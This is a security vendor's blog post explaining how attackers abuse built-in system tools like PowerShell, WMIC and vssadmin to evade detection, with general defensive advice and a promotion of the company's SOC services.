In this four-part series, Systal’s SOC Analyst Abbey Adegbola delves into the adversary trends affecting the ever evolving cybersecurity landscape. Part two focuses on ‘Defending Against the Use of Native Tools by Adversaries’.
The cybersecurity landscape is abuzz with discussions about the potential misuse of generative AI for everything from sophisticated phishing to malware generation by threat actors. Most organisations are focused on the continued evolution of generative AI, but there are other critical adversarial trends that continue to shape the threat landscape. It is essential for security teams, businesses, and individuals alike to remain ahead of the latest threats in order to be able to safeguard their data and infrastructure.
While the threats posed by generative AI are genuine, it is crucial not to overlook some prevalent and insidious adversarial trends. Part One of this cyber trends series looked at the ‘Continued Exploitation of Misconfigurations and Unpatched Systems’. Part two continues, covering another prevalent trend: Living off the Land.
Why LOL is No Laughing Matter – Defending Against the Use of Native Tools by Adversaries
‘Living off the Land’ (LOL) is a technique which is now widely used by threat actors and other adversary groups to assist in their attempts to evade detection and reduce their footprint in environments they are targeting. This technique involves the use of native system utilities and programmes that are either installed by default in most environments, or that are identified by attackers during the reconnaissance phase of their activities. These are then leveraged to move laterally, stage and exfiltrate data or maintain persistence in their victim’s environment.
Native tools are legitimate system utilities and binaries, pre-installed by default on systems. Examples of Living Off the Land Binaries (LOLBins) include PowerShell, WMIC, PsExec, Certutil; Remote Monitoring and Management (RMM) tools such as RDP, WinRM; and many others. For adversaries, these tools offer several advantages, such as staying stealthy, evading detection by security tools and providing extensive capabilities. Their use is less likely to raise immediate suspicion compared to dropping custom malware. Adversaries can increase their chances of accomplishing their objectives without being noticed by using these legitimate tools to infiltrate and navigate networks covertly. Many ransomware groups, such as Akira, LockBit and Phobos, are known to use PowerShell, vssadmin.exe, Windows Management Instrumentation command-line utility (WMIC) and many more to discover and delete volume shadow copies in Windows environments in order to frustrate and prevent victims from recovering files after encryption has taken place.
According to IBM X-Force Threat Intelligence Index 2024, up to one-third (32%) of incidents that the X-Force team responded to in 2023 were cases in which legitimate tools were utilised by adversaries for malicious activities such as reconnaissance, credential theft, privilege escalation, data exfiltration and remote access. PowerShell, for example, is an incredibly powerful scripting tool which is often misused and weaponised by adversaries to download remote payloads, execute malicious code in memory and move laterally across systems. In recent months, Systal’s own DFIR team have identified the adversarial use of utilities such as Windows Remote Desktop, vssadmin.exe, WinSCP and WinRAR to name but a few.
The Challenge for Defence
Detecting malicious use of native system tools is inherently difficult because these tools serve legitimate administrative purposes therefore distinguishing malicious intent from regular use is usually tricky. Also, context is vital because a command that is benign on a developer’s or administrator’s workstation would be suspicious on a HR system. These are powerful tools with legitimate uses and the key is in spotting the deviation from normal activities.
It is worth noting that these tools and utilities are double-edged swords. While they enhance system administration and remote management, they can also be abused by adversaries. To protect against their abuse, organisations must adopt robust security practices, monitor tool usage, ensure the use of endpoint detection and response (EDR) solutions, restrict unnecessary privileges to mitigate risks and implement the principle of least privilege making it harder for adversaries to abuse legitimate tools even if they gain a foothold.
Systal’s Capabilities to Protect Organisations
It is highly essential for organisations of any size to have a robust and effective cybersecurity program, which encompasses the fundamental security practices, in place. However, many organisations find it difficult to create and maintain a robust cybersecurity program and healthy cybersecurity culture that can keep pace with the threat landscape. Systal offers a broad range of cybersecurity services from security operations, digital forensics and incident response to professional services that fully manage a customer’s security and protect their digital assets and environment. Our strong capabilities in continuous monitoring, managed detection and response can help organisations protect themselves against ever evolving and sophisticated cyber threats.
Systal Operational Services offer a comprehensive framework to protect your organisation’s digital health and resilience using cutting-edge technology. With a dedicated global SOC and proven Cyber Security Incident Response Team (CSIRT), our services are meticulously designed to proactively monitor, manage, detect, respond, and remediate potential cyber threats. For more information on how Systal can help solve your cybersecurity challenges contact our experts.
Next in the series, we will be examining the prevalent identity-based attacks and how this will continue to take centre stage.
Abbey Adegbola is an experienced Security Engineer working with Systal Technology Solutions. Abbey brings over seven years of IT support experience and SOC analyst experience into the Security team within Systal, providing security engineering support and L3 SOC analysis services to Systal’s customers and internal Security Team. Abbey is also a skilled malware analyst and reverse engineer who works to support the capabilities of Systal’s Cyber Security and Incident Response Teams.
Contact Systal's Experts